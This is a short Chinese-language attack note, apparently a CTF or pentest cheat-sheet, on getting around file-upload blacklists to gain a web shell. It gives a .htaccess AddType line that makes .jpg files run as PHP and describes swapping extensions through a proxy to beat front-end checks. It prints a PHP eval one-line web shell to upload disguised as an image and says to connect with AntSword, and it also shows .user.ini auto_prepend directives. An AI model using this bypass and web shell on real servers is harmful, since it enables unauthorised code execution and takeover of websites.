在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有警用.htaccee那么就能触发getshell
.htaccess可以把.jpg解析成php
AddType application/x-httpd-php .jpg
先上传.htaccess文件,但是要修改后缀来绕过前端验证,在通过抓包修改回来
再上传jpg的文件,其实是将php一句话木马的文件改为jpg后缀
PHP: <?php @eval($_POST['404']);?>
用蚁剑连接
https://www.cnblogs.com/sijidou/p/13121301.html
//.user.ini
auto_prepend_file=top.html
auto_append_file=down.html